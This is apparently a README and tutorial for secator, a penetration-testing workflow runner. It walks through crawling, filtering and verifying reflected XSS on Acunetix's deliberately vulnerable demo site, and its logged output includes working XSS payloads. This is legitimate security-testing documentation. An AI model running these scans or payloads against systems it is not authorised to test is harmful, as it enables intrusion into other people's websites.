secator
secator is a task and workflow runner for security assessments. It supports dozens of well-known security tools and is designed to improve the productivity of penetration testers and security researchers.
Demo
https://github.com/freelabz/secator/raw/main/images/demo.gif
Features
- Curated list of commands
- Unified input options
- Unified output schema
- CLI and library usage
- Distributed options with Celery
- From simple tasks to complex workflows
- Customizable
Supported tools
secator integrates the following tools:
| Tool | Category |
|---|---|
| httpx | http |
| cariddi | http/crawler |
| gau | http/crawler |
| gospider | http/crawler |
| katana | http/crawler |
| dirsearch | http/fuzzer |
| feroxbuster | http/fuzzer |
| ffuf | http/fuzzer |
| h8mail | osint |
| dnsx | recon/dns |
| dnsxbrute | recon/dns |
| subfinder | recon/dns |
| fping | recon/ip |
| mapcidr | recon/ip |
| naabu | recon/port |
| maigret | recon/user |
| gf | tagger |
| grype | vuln/code |
| dalfox | vuln/http |
| msfconsole | vuln/http |
| wpscan | vuln/multi |
| nmap | vuln/multi |
| nuclei | vuln/multi |
| searchsploit | exploit/search |
You can request a new tool at any time by opening an issue, but before doing so, please check that the tool meets our selection criteria. If it does not but you still want to integrate it into secator, you can plug it in yourself (see the development guide).
Installation
Install secator
Pipx
pipx install secator
pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is required to persist all secator reports to the host, and --net=host is recommended to grant full access to the host network.
You can add an alias for this command to make it easier to run:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator as if it were installed on bare metal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator-client secator --help
Note: if you chose the Bash, Docker or Docker Compose installation method, you can skip the next section and go straight to Usage.
Install languages
secator relies on external languages, so you may need to install the languages its tools are written in (assuming they are not already installed on your system).
If you do not manage the required languages yourself, we provide utilities to install them:
Go
secator install langs go
Ruby
secator install langs ruby
Install tools
secator does not install any of the external tools it supports by default.
We provide utilities to install or update each supported tool; these should work on any system that supports apt:
All tools
secator install tools
A specific tool
secator install tools <TOOL_NAME>
For example, to install httpx, use:
secator install tools httpx
Before running secator, make sure you are using the latest available version of each tool, otherwise you may run into parsing/formatting issues.
Install addons
secator is installed with a minimal set of dependencies.
Several addons are available for secator:
worker
Add support for Celery workers (see Distributed runs with Celery).
secator install addons worker
google
Add support for the Google Drive exporter (-o gdrive).
secator install addons google
mongodb
Add support for the MongoDB driver (-driver mongodb).
secator install addons mongodb
redis
Add support for the Redis backend (Celery).
secator install addons redis
dev
Add the development tools needed to run the tests, such as coverage and flake8.
secator install addons dev
trace
Add the tracing tools needed for the tracing features, such as memray and pyinstrument.
secator install addons trace
build
Add hatch for building and publishing the PyPI package.
secator install addons build
Install CVEs
secator makes remote API calls to https://cve.circl.lu/ to fetch details about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are served from disk:
secator install cves
Check installation health
To find out which languages and tools (and which versions) are installed on your system:
secator health
secator --help
Usage examples
Run a fuzzing task (ffuf):
secator x ffuf http://testphp.vulnweb.com/FUZZ
Run a URL crawl workflow:
secator w url_crawl http://testphp.vulnweb.com
Run a host scan:
secator s host mydomain.com
And more... To list all the tasks, workflows and scans you can use:
secator x --help
secator w --help
secator s --help
Usage
This quick start focuses on using secator to find vulnerabilities on the http://testphp.vulnweb.com website.
We start with simple secator tasks, then show how to use workflows to speed up the session considerably.
Using tasks
Step 1: Run katana on the root URL
We first use a crawler to find URLs that might be useful for exploitation. The crawler we use most often is katana, a ProjectDiscovery tool.
We save the results to a .txt file:
secator x katana http://testphp.vulnweb.com -o txt
__
__________________/ /__________
/ ___/ _ / ___/ __ `/ __/ __ / ___/
(__ / __/ /__/ /_/ / /_/ /_/ / /
/____/___/___/__,_/__/____/_/ v0.0.1
freelabz.com
[13:34:53] katana -silent -jc -js-crawl -known-files all -u http://testphp.vulnweb.com -json -concurrency 50 _base.py:614
🔗 http://testphp.vulnweb.com [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/high [404] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/index.php
🔗 http://testphp.vulnweb.com/style.css [200] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/privacy.php [404] [PHP:5.6.40, Ubuntu, Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/AJAX/index.php [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/categories.php [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/cart.php [200] [PHP:5.6.40, Ubuntu, DreamWeaver, Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/artists.php [200] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/ [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/hpp/ [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/disclaimer.php [200] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/login.php [200] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php [200] [Ubuntu, Nginx:1.19.0, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/guestbook.php [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/userinfo.php
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/comment.php?aid=3 [200] [Ubuntu, Nginx:1.19.0, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/search.php?test=query [200] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/Templates/high
🔗 http://testphp.vulnweb.com/comment.php?aid=2
🔗 http://testphp.vulnweb.com/artists.php?artist=1 [200] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/hpp/?pp=12 [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/signup.php [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/comment.php?aid=1
🔗 http://testphp.vulnweb.com/AJAX/showxml.php [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/AJAX/styles.css [200] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/artists.php?artist=3 [200] [PHP:5.6.40, Ubuntu, DreamWeaver, Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=3 [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=2 [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/showimage.php?file= [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/artists.php?artist=2 [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=4
🔗 http://testphp.vulnweb.com/listproducts.php?cat=1 [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🗄 Saved TXT reports to
• /home/vagrant/.secator/reports/default/tasks/task_katana_target_2023_07_04-01_33_13_152782_PM.txt
• /home/vagrant/.secator/reports/default/tasks/task_katana_url_2023_07_04-01_33_13_152782_PM.txt
katana found some quite interesting results, including a few PHP files that may be vulnerable.
Step 2: Run httpx on the found URLs to keep only alive URLs
Crawlers usually find URLs in HTML response bodies, which means we do not know whether those URLs actually answer HTTP requests.
To keep only the URLs that return a valid HTTP status code, we can run httpx on the previous results (the txt file). We add some rate limiting (-rl) to be respectful of the server instead of flooding it for no reason.
We also only want to keep a few HTTP codes (-mc), for example 200, 301 and 500, the latter because errors can be useful to us:
secator x httpx /home/vagrant/.secator/reports/default/tasks/task_katana_target_2023_07_04-01_33_13_152782_PM.txt -rl 10 -mc 200,301,500
[13:19:35] httpx -silent -td -asn -cdn -l /tmp/httpx_2023_07_04-01_19_35_686343_PM.txt -json -threads 50 -match-code 200,301,500 _base.py:614
🔗 http://testphp.vulnweb.com/showimage.php?file [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [image/jpeg] [196]
🔗 http://testphp.vulnweb.com/hpp [200] [HTTP Parameter Pollution Example] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [203]
🔗 http://testphp.vulnweb.com/cart.php [200] [you cart] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4903]
🔗 http://testphp.vulnweb.com/categories.php [200] [picture categories] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [6115]
🔗 http://testphp.vulnweb.com/artists.php?artist=3 [200] [artists] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [6193]
🔗 http://testphp.vulnweb.com/comment.php?aid=3 [200] [comment on artist] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [1252]
🔗 http://testphp.vulnweb.com/comment.php?aid=2 [200] [comment on artist] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [1252]
🔗 http://testphp.vulnweb.com/AJAX/showxml.php [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [11]
🔗 http://testphp.vulnweb.com/style.css [200] [nginx/1.19.0] [Nginx:1.19.0] [text/css] [5482]
🔗 http://testphp.vulnweb.com/artists.php?artist=1 [200] [artists] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [6251]
🔗 http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php [200] [Document titleg] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4697]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3 [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [313]
🔗 http://testphp.vulnweb.com/AJAX/styles.css [200] [nginx/1.19.0] [Nginx:1.19.0] [text/css] [562]
🔗 http://testphp.vulnweb.com/hpp/?pp=12 [200] [HTTP Parameter Pollution Example] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [383]
🔗 http://testphp.vulnweb.com/login.php [200] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [5523]
🔗 http://testphp.vulnweb.com/guestbook.php [200] [guestbook] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [5390]
🔗 http://testphp.vulnweb.com/signup.php [200] [signup] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [6033]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [319]
🔗 http://testphp.vulnweb.com/search.php?test=query [200] [search] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4732]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=3 [200] [pictures] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4699]
🔗 http://testphp.vulnweb.com/AJAX/index.php [200] [ajax test] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4236]
🔗 http://testphp.vulnweb.com/disclaimer.php [200] [disclaimer] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [5524]
🔗 http://testphp.vulnweb.com/artists.php?artist=2 [200] [artists] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [6193]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=4 [200] [pictures] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4699]
🔗 http://testphp.vulnweb.com/artists.php [200] [artists] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [5328]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=2 [200] [pictures] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [5311]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [975]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=1 [200] [pictures] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [7880]
🔗 http://testphp.vulnweb.com/comment.php?aid=1 [200] [comment on artist] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [1252]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2 [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [279]
🔗 http://testphp.vulnweb.com [200] [Home of Acunetix Art] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4958]
🔗 http://testphp.vulnweb.com/index.php [200] [Home of Acunetix Art] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4958]
🗄 Saved TXT reports to
• /home/vagrant/.secator/reports/default/tasks/task_httpx_target_2023_07_04-01_34_22_081275_PM.txt
• /home/vagrant/.secator/reports/default/tasks/task_httpx_url_2023_07_04-01_34_22_081275_PM.txt
Step 3: Run gf on the found URLs
gf lets us run patterns over URLs, which we can use to quickly flag potentially interesting URLs: XSS, LFI, SSRF, RCE, interesting parameters or insecure direct object references. Let's look for potential XSS:
secator x gf --pattern xss /home/vagrant/.secator/reports/default/tasks/task_httpx_target_2023_07_04-01_34_22_081275_PM.tx
🏷️ [xss]http://testphp.vulnweb.com/comment.php?aid=1 []
🏷️ [xss]http://testphp.vulnweb.com/comment.php?aid=2 []
🏷️ [xss]http://testphp.vulnweb.com/comment.php?aid=3 []
🏷️ [xss]http://testphp.vulnweb.com/hpp/?pp=12 []
Hmm, it looks like we may have some interesting XSS targets here. Let's use dalfox to find out!
Step 4: Run dalfox on the potential XSS links
dalfox is a very thorough XSS checker; let's run it on the identified targets:
secator x dalfox http://testphp.vulnweb.com/hpp/?pp=12
[13:41:28] dalfox --silence url 'http://testphp.vulnweb.com/hpp/?pp=12' --format json --worker 50 _base.py:614
🚨 [Verified XSS] [high] http://testphp.vulnweb.com/hpp/ [CWE-83] [inject_type:inATTR-double(3)-URL, poc_type:plain, method:GET,
data:http://testphp.vulnweb.com/hpp/?pp=12%22id%3Dx+tabindex%3D1+style%3D%22display%3Ablock%3Btransition%3Aoutline+1s%3B%22+ontransitionend%3Dalert.apply%28null%2C1%29+class%3Ddalfox+, param:pp, payload:"id=x tabindex=1
style="display:block;transition:outline 1s;" ontransitionend=alert.apply(null,1) class=dalfox , evidence:4line: ms.php?p=valid&pp=12"id=x tabindex=1 style="display:block;transition:outline 1s;, message_id:1103, message_str:Triggered XSS Payload
(found DOM Object): pp="id=x tabindex=1 style="display:block;transition:outline 1s;" ontransitionend=alert.apply(null,1) class=dalfox ]
We found a verified XSS!
We could confirm this XSS in a browser, but dalfox has already given us proof that it works...
Using task pipelines
secator supports UNIX pipes out of the box. You can write a secator pipeline that automates the previous 4 steps:
secator x katana http://testphp.vulnweb.com | secator x httpx | secator x gf --pattern xss -fmt '{match}' | secator x dalfox
You do not need to specify any extra flags compared to a normal run, because secator detects that it is running inside a UNIX pipe and automatically passes the right input between task invocations:
- By default, it passes the raw string result of the previous task on stdin. If a task can produce several output types, the first one listed in the class's output_types attribute is chosen.
- We can choose which field to use when passing raw strings with the -fmt option. In the previous command, -fmt '{match}' tells secator to pass only the match field of the Tag objects found by gf, as string input, to dalfox.
Command output
[13:50:29] katana -silent -jc -js-crawl -known-files all -u http://testphp.vulnweb.com -json -concurrency 50 _base.py:614
[13:50:43] httpx -silent -td -asn -cdn -l /tmp/httpx_2023_07_04-01_50_43_044323_PM.txt -json -threads 50 _base.py:614
[13:50:49] cat /tmp/gf_2023_07_04-01_50_49_787397_PM.txt | gf xss _base.py:614
[13:50:49] dalfox --silence file /tmp/dalfox_2023_07_04-01_50_49_855768_PM.txt --format json --worker 50 _base.py:614
🚨 [Verified XSS] [high] http://testphp.vulnweb.com/hpp/ [CWE-83] [inject_type:inATTR-double(3)-URL, poc_type:plain, method:GET,
data:http://testphp.vulnweb.com/hpp/?pp=12%22%26%2339%3B%3E%3Caudio+controls+ondurationchange%3Dprompt%281%29+id%3Ddalfox%3E%3Csource+src%3D1.mp3+type%3Daudio%2Fmpeg%3E%3C%2Faudio%3E, param:pp, payload:"'><audiocontrols
ondurationchange=prompt(1)id=dalfox><sourcesrc=1.mp3type=audio/mpeg></audio>, evidence:4 line: ms.php?p=valid&pp=12"'><audiocontrolsondurationchange=prompt(1)id=dalfox>, message_id:1862, message_str:Triggered XSS Payload (found DOM
Object): pp="'><audiocontrolsondurationchange=prompt(1)id=dalfox><sourcesrc=1.mp3type=audio/mpeg></audio>]
This is already a nice time saving compared to the verbose individual tasks above.
Using workflows
Task pipelines are great for finding things quickly, but workflows are better suited to repeating the same set of tasks on different sets of targets, with all tasks sharing the same input options, while filtering the final results, reacting to live results, and so on...
Here is the secator workflow corresponding to the previous set of tasks, xss_finder.yaml:
type: workflow
name: xss_finder
description: XSS Finder
tasks:
  katana:
    description: Crawling root URL
  httpx:
    description: Finding alive URLs
    targets_:
    - type: url
      field: url
      condition: item.status_code == 0
  gf:
    description: Identifying XSS
    targets_:
    - url.url
  dalfox:
    description: Verifying XSS
    targets_:
    - type: tag
      field: match
      condition: item.name == 'xss'
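To make the target-selection rules concrete, here is an added illustration (not secator's own code) of what the targets_ filters in xss_finder.yaml and the -fmt '{match}' pipe option described earlier do: each picks, from the previous task's results, the strings the next task receives. The sample items are constructed to match the walkthrough output; the _type key and the small condition grammar are assumptions of this example.

```python
import re

# Constructed sample items shaped like the objects the tasks above emit:
# 'url' items from katana/httpx and 'tag' items from gf. A '_type' key
# carrying the output type is an assumption of this illustration.
ITEMS = [
    {"_type": "url", "url": "http://testphp.vulnweb.com/index.php", "status_code": 0},
    {"_type": "url", "url": "http://testphp.vulnweb.com/hpp/?pp=12", "status_code": 200},
    {"_type": "url", "url": "http://testphp.vulnweb.com/userinfo.php", "status_code": 0},
    {"_type": "tag", "name": "xss", "match": "http://testphp.vulnweb.com/hpp/?pp=12"},
    {"_type": "tag", "name": "lfi", "match": "http://testphp.vulnweb.com/showimage.php?file="},
]

# The targets_ entries of xss_finder.yaml, as Python literals.
HTTPX_TARGETS = [{"type": "url", "field": "url", "condition": "item.status_code == 0"}]
GF_TARGETS = ["url.url"]
DALFOX_TARGETS = [{"type": "tag", "field": "match", "condition": "item.name == 'xss'"}]

# Condition grammar accepted here: item.<field> (==|!=) <int | 'str' | "str">.
# A tiny parser is used instead of eval() so a workflow file can never run code.
_COND = re.compile(r"""^item\.(\w+)\s*(==|!=)\s*('([^']*)'|"([^"]*)"|-?\d+)$""")


def parse_condition(cond):
    """Compile a workflow condition string into a predicate over one item."""
    m = _COND.match(cond.strip())
    if not m:
        raise ValueError(f"unsupported condition: {cond!r}")
    field, op, raw, single, double = m.groups()
    if single is not None:
        value = single
    elif double is not None:
        value = double
    else:
        value = int(raw)
    if op == "==":
        return lambda item: item.get(field) == value
    return lambda item: item.get(field) != value


def select_targets(items, targets_):
    """Apply a targets_ list: each entry is 'type.field' or a mapping with
    type, field and an optional condition. Returns the next task's inputs."""
    selected = []
    for spec in targets_:
        if isinstance(spec, str):
            type_, field = spec.split(".", 1)
            keep = None
        else:
            type_, field = spec["type"], spec["field"]
            keep = parse_condition(spec["condition"]) if "condition" in spec else None
        for item in items:
            if item.get("_type") == type_ and (keep is None or keep(item)):
                selected.append(str(item[field]))
    return selected


def format_stdin(items, fmt):
    """Mimic -fmt in a UNIX pipe: render each item with the format string,
    one per line, so the next task reads e.g. only the 'match' field."""
    return "\n".join(fmt.format(**item) for item in items)
```

With these inputs the httpx rule keeps only the two URLs katana reported without a status code, and the dalfox rule keeps only the URL tagged xss, which is exactly the narrowing visible in the workflow output.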
Here is the same workflow run with secator:
secator w xss_finder.yaml http://testphp.vulnweb.com
Command output
╭────── Workflow xss_finder ──────╮
│ 📜 Description: XSS Finder │
│ 👷 Workspace: default │
│ 🍐 Targets: │
│ • http://testphp.vulnweb.com │
│ 📌 Options: │
│ • threads: 50 │
│ • headless: False │
│ • system_chrome: False │
│ • follow_redirect: False │
│ • debug_resp: False │
│ ✉ Exporters: │
│ • json │
│ • csv │
╰─────────────────────────────────╯
[14:03:31] 🎉 Workflow xss_finder starting... _base.py:614
🔧 Crawling root URL ...
[14:03:32] katana -silent -jc -js-crawl -known-files all -u http://testphp.vulnweb.com -json -concurrency 50 _base.py:614
🔗 http://testphp.vulnweb.com [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/high [404] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/ [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/index.php
🔗 http://testphp.vulnweb.com/style.css [200] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/guestbook.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/AJAX/index.php [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/login.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/cart.php [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/privacy.php [404] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/hpp/ [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/categories.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/artists.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/disclaimer.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/userinfo.php
🔗 http://testphp.vulnweb.com/listproducts.php?cat=3
🔗 http://testphp.vulnweb.com/comment.php?aid=1 [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=4 [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/comment.php?aid=3
🔗 http://testphp.vulnweb.com/artists.php?artist=2 [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/comment.php?aid=2
🔗 http://testphp.vulnweb.com/signup.php [200] [PHP:5.6.40, DreamWeaver, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/artists.php?artist=3 [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/artists.php?artist=1 [200] [Ubuntu, PHP:5.6.40, DreamWeaver, Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=1 [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/AJAX/showxml.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/showimage.php?file= [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/hpp/?pp=12 [200] [Ubuntu, PHP:5.6.40, Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/AJAX/styles.css [200] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/Templates/high
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=2 [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/search.php?test=query [200] [Nginx:1.19.0, Ubuntu, DreamWeaver, PHP:5.6.40]
🔧 Finding alive URLs ...
[14:03:45] httpx -silent -td -asn -cdn -l /tmp/httpx_2023_07_04-02_03_45_807367_PM.txt -json -threads 50 _base.py:614
🔗 http://testphp.vulnweb.com/Templates/high [404] [404 Not Found] [nginx/1.19.0] [Nginx:1.19.0] [text/html] [153]
🔗 http://testphp.vulnweb.com/index.php [200] [Home of Acunetix Art] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4958]
🔗 http://testphp.vulnweb.com/comment.php?aid=2 [200] [comment on artist] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [1252]
🔗 http://testphp.vulnweb.com/userinfo.php [302] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [14]
🔗 http://testphp.vulnweb.com/comment.php?aid=3 [200] [comment on artist] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [1252]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=3 [200] [pictures] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4699]
🔧 Identifying XSS ...
[14:03:52] cat /tmp/gf_2023_07_04-02_03_52_398624_PM.txt | gf xss _base.py:614
🏷️ [xss] http://testphp.vulnweb.com/comment.php?aid=1 []
🏷️ [xss] http://testphp.vulnweb.com/comment.php?aid=2 []
🏷️ [xss] http://testphp.vulnweb.com/comment.php?aid=3 []
🏷️ [xss] http://testphp.vulnweb.com/hpp/?pp=12 []
🔧 Verifying XSS ...
[14:03:54] dalfox --silence file /tmp/dalfox_2023_07_04-02_03_52_411553_PM.txt --format json --worker 50 _base.py:614
🚨 [Verified XSS] [high] http://testphp.vulnweb.com/hpp/ [CWE-83] [inject_type:inATTR-double(3)-URL, poc_type:plain, method:GET,
data:http://testphp.vulnweb.com/hpp/?pp=12%22onmouseenter%3Dprompt.call%28null%2C1%29+class%3Ddalfox+, param:pp, payload:"onmouseenter=prompt.call(null,1) class=dalfox , evidence:4 line: ms.php?p=valid&pp=12"onmouseenter=prompt.call(null,1)
class=dalfox ">link2</a><b, message_id:1540, message_str:Triggered XSS Payload (found DOM Object): pp="onmouseenter=prompt.call(null,1) class=dalfox ]
[14:04:20] 🎉 Workflow xss_finder succeeded in 48 seconds. _base.py:614
🗄 Saved JSON report to /home/vagrant/.secator/reports/default/workflows/workflow_xss_finder_2023_07_04-02_04_20_160856_PM.json
🗄 Saved CSV reports to
• /home/vagrant/.secator/reports/default/workflows/workflow_xss_finder_target_2023_07_04-02_04_20_160856_PM.csv
• /home/vagrant/.secator/reports/default/workflows/workflow_xss_finder_url_2023_07_04-02_04_20_160856_PM.csv
• /home/vagrant/.secator/reports/default/workflows/workflow_xss_finder_tag_2023_07_04-02_04_20_160856_PM.csv
• /home/vagrant/.secator/reports/default/workflows/workflow_xss_finder_vulnerability_2023_07_04-02_04_20_160856_PM.csv
Learn more
To dive deeper into secator, check out:
- Our full documentation
- Our getting-started tutorial video
- Our Medium posts
- Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube
Project page
GitHub:
https://github.com/freelabz/secator
Originally published by the WeChat public account 云梦安全: secator, the penetration tester's Swiss Army knife